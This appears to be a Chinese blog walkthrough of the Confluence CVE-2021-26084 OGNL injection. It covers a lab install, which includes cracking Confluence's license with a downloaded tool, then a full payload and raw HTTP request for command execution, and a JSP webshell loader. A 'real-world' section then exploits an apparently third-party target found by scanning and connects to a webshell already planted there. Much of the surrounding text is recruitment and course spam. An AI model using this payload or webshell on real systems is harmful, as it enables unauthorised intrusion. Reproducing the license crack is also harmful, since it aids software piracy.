CVE-2021-26084(confluence)

还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!

王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。

对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!

【完整版领取方式在文末!!】

93道网络安全面试题

需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)

内容实在太多,不一一截图了

黑客学习资源推荐

最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

😝朋友们如果有需要的话,可以联系领取~

1️⃣零基础入门
① 学习路线

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

image

② 路线对应学习视频

同时每个成长路线对应的板块都有配套的视频提供:

image-20231025112050764

2️⃣视频配套工具&国内外网安书籍、文档
① 工具

② 视频

image1

③ 书籍

image2

资源较为敏感,未展示全面,需要的最下面获取

在这里插入图片描述在这里插入图片描述

② 简历模板

在这里插入图片描述

因篇幅有限,资料较为敏感仅展示部分资料,添加上方即可获取👆

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

mysql -u root mysql # 免密登录mysql
update mysql.user set authentication_string=password(‘root6666’) where user=‘root’; //修改 root 用户的密码
flush privileges; //刷新生效
sudo service mysql stop //停止 mysql 服务
sudo gedit /etc/mysql/mysql.conf.d/mysqld.cnf //还原mysql 配置
sudo service mysql restart //重启 mysql 服务
mysql -u root -p //登录mysql
create database confluence default character set utf8 collate utf8_bin; //创建数据库
create user ‘confluence’@‘%’ identified by ‘confluence123’;
//添加 confluence 用户
select * from mysql.user where user=‘confluence’; //看一下创建成功了吗
grant all on confluence.* to ‘confluence’@‘%’ identified by ‘confluence123’; //为 confluence 用户授权
show grants for ‘confluence’@‘%’; //看一下成功了吗
select @@global.tx_isolation, @@tx_isolation;
set global tx_isolation=‘read-committed’;


补充说明:  
 MySQL的登录设置修改后应该如下图所示  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/582c4b60b1494139a7b23765f5bca420.png#pic_center)还原MySQL登陆设置就是如下图  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/39afbecc2dab40079d89f9597a6c2791.png#pic_center)  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/9e107eff36a64c5285b52fcb1ec1c5d4.png#pic_center)


### 3、安装并破解 Confluence


下载界面: https://www.atlassian.com/software/confluence/download-archives  
 6.12.2 - Linux Installer(64 bit) 下载链接: https://product-downloads.atlassian.com/software/confluence/downloads/atlassian-confluence-6.12.2-x64.bin  
 先修改文件权限,命令:chmod +x atlassian-confluence-6.12.2-x64.bin  
 安装文件,命令:./atlassian-confluence-6.12.2-x64.bin  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/0f7cc001b4ca43eeba1cee5fe525c253.png#pic_center)然后就完成啦  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/6bcda3e681e6435fa031bde369795e1f.png#pic_center)  
 安装完成之后通过访问 虚拟机的 ip+端口8090  
 PS:如果 ifconfig 命令没查到那么按照提示 sudo apt install net-tools 安装之后就能查到了  
 选择产品安装,下一步到下面界面,复制服务器ID  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/b673262c313e448096899ee13d67bf0b.png#pic_center)


在服务器上停止 confluence 的运行,命令:sh /home/ubontu/atlassian/confluence/bin/stop-confluence.sh (注意路径,不清楚的可以切换到根目录后使用命令 sudo find -name stop-confluence.sh 查看)  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/6d90d069340444cf94b5f9b7814553f3.png#pic_center)


从服务器上拷贝出文件 /home/ubontu/atlassian/confluence/confluence/WEB-INF/lib/atlassian-extras-decoder-v2-3.4.1.jar (路径同上查找)  
 命令:cp /home/ubontu/atlassian/confluence/confluence/WEB-INF/lib/atlassian-extras-decoder-v2-3.4.1.jar atlassian-extras-2.4.jar  
 下载破解工具并运行 破解工具 : 链接:https://pan.baidu.com/s/1Pi\_ClXR6T4bLbJ-mPxYXtw 提取码:g3p5  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/3f4ea1fb715e4a26a4ea8c5a1868ad26.png#pic_center)


之后再把文件重命名为 atlassian-extras-decoder-v2-3.4.1 放回原来路径下  
 命令:cp atlassian-extras-decoder-v2-3.4.1.jar /home/ubontu/atlassian/confluence/confluence/WEB-INF/lib/atlassian-extras-decoder-v2-3.4.1.jar  
 同时将 [Mysql 驱动]( )拷贝到同级目录  
 命令:cp mysql-connector-java-5.1.48.jar /home/ubontu/atlassian/confluence/confluence/WEB-INF/lib/  
 然后启动,命令:sh /home/ubontu/atlassian/confluence/bin/start-confluence.sh  
 输入授权码(即 key 里面的内容)  
 选择我自己的数据库  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/cbd8d2586e2a46cfb9324e06758ef563.png#pic_center)


然后下一步点击空白站点;再下一步点击在Confluence中管理用户和组  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/2ecead88c89744a7b982956ad135404c.png#pic_center)


之后这样就是成功了  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/f083de81881d4a719b82a53f60d28c3f.png#pic_center)


## 二、漏洞检测


poc地址: https://github.com/0xf4n9x/CVE-2021-26084  
 下载解压后运行  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/0b1efe1fdeda41d29109c3742fe150e9.png#pic_center)


竟然没有  
 直接试下传包吧  
 payload如下



queryString=\u0027%2b#{\u0022\u0022[\u0022class\u0022].forName(\u0022javax.script.ScriptEngineManager\u0022).newInstance().getEngineByName(\u0022js\u0022).eval(\u0022var isWin=java.lang.System.getProperty(\u0027os.name\u0027).toLowerCase().contains(\u0027win\u0027);var p=new java.lang.ProcessBuilder;if(isWin){p.command([\u0027cmd.exe\u0027,\u0027/c\u0027,\u0027whoami\u0027]);}else{p.command([\u0027/bin/bash\u0027,\u0027-c\u0027,\u0027whoami\u0027]);}p.redirectErrorStream(true);var pc=p.start();org.apache.commons.io.IOUtils.toString(pc.getInputStream())\u0022)}%2b\u0027


也就是发包



POST /pages/doenterpagevariables.action HTTP/1.1
Host: 192.168.223.129:8090
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 575
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

queryString=\u0027%2b#{\u0022\u0022[\u0022class\u0022].forName(\u0022javax.script.ScriptEngineManager\u0022).newInstance().getEngineByName(\u0022js\u0022).eval(\u0022var isWin=java.lang.System.getProperty(\u0027os.name\u0027).toLowerCase().contains(\u0027win\u0027);var p=new java.lang.ProcessBuilder;if(isWin){p.command([\u0027cmd.exe\u0027,\u0027/c\u0027,\u0027whoami\u0027]);}else{p.command([\u0027/bin/bash\u0027,\u0027-c\u0027,\u0027whoami\u0027]);}p.redirectErrorStream(true);var pc=p.start();org.apache.commons.io.IOUtils.toString(pc.getInputStream())\u0022)}%2b\u0027


可以看到返回包时存在漏洞的  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/1af9105d193b48caba9b434b0a6b91ef.png#pic_center)


换命令也可以  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/2fbce52b745349d2b9c9b73043c7986c.png#pic_center)


## 三、实战


goby扫描出目标主机存在该漏洞  
 查看当前路径  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/5778b96f836745be88c81c71edc26bad.png#pic_center)


查看当前用户  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/87f4036c1366495f8147b12006d31507.png#pic_center)


列出路径下文件列表  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/cd95e61fd98b4d7c8e326979268f67c4.png#pic_center)


在该路径创建一个jsp文件,命令:touch …/confluence/mmy.jsp  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/6e9f5b38837746849f7a620ee553fa60.png#pic_center)


那么试一下能不能写入,命令:echo+1234455+\u003E…/confluence/mmy.jsp  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/70e533f6a0a34f079fdebffb8c1729ec.png#pic_center)


能写进去,那么写个jsp小马进去



<%!
class U extends ClassLoader {
U(ClassLoader c) {
super©;
}
public Class g(byte[] b) {
return super.defineClass(b, 0, b.length);
}
}

public byte[] base64Decode(String str) throws Exception {
    try {
        Class clazz = Class.forName("sun.misc.BASE64Decoder");
        return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
    } catch (Exception e) {
        Class clazz = Class.forName("java.util.Base64");
        Object decoder = clazz.getMethod("getDecoder").invoke(null);
        return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
    }
}

%>
<%
String cls = request.getParameter(“passwd”);
if (cls != null) {
new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
}
%>


但是不知道为什么,小马写不进去,同事说是因为编码的原因但是我搞不出来  
 然后我就发现它本来就有一个马,不知道哪个大佬写得  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/023a01128d5146e6a77dc310de95ffc3.png#pic_center)


查看文件找到密码  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/1f6e7db4558c4d8cbbacc5d2fe28186e.png#pic_center)


之后蚁剑连接  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/d5ccef0cb4d5465ea20a8ae0f862f9ed.png#pic_center)


成功,那么先看下它进程,因为是Linux,所以输入命令:ps aux  



本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。


最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。


最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!下面就开始进入正题,如何从一个萌新一步一步进入网络安全行业。


![](https://img-blog.csdnimg.cn/img_convert/311903982dea1d8a5d2c98fc271b5b41.jpeg)

**需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)**

### 学习路线图


 其中最为瞩目也是最为基础的就是网络安全学习路线图,这里我给大家分享一份打磨了3个月,已经更新到4.0版本的网络安全学习路线图。


相比起繁琐的文字,还是生动的视频教程更加适合零基础的同学们学习,这里也是整理了一份与上述学习路线一一对应的网络安全视频教程。


![](https://img-blog.csdnimg.cn/img_convert/1ddfaf7dc5879b1120e31fafa1ad4dc7.jpeg)


#### 网络安全工具箱


当然,当你入门之后,仅仅是视频教程已经不能满足你的需求了,你肯定需要学习各种工具的使用以及大量的实战项目,这里也分享一份**我自己整理的网络安全入门工具以及使用教程和实战。**


![](https://img-blog.csdnimg.cn/img_convert/bcd1787ce996787388468bb227d8f959.jpeg)


#### 项目实战


最后就是项目实战,这里带来的是**SRC资料&HW资料**,毕竟实战是检验真理的唯一标准嘛~


![](https://img-blog.csdnimg.cn/img_convert/35fc46df24091ce3c9a5032a9919b755.jpeg)


#### 面试题


归根结底,我们的最终目的都是为了就业,所以这份结合了多位朋友的亲身经验打磨的面试题合集你绝对不能错过!

**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**

**[需要这份系统化资料的朋友,可以点击这里获取](https://bbs.csdn.net/topics/618540462)**

**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**

  • 4
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值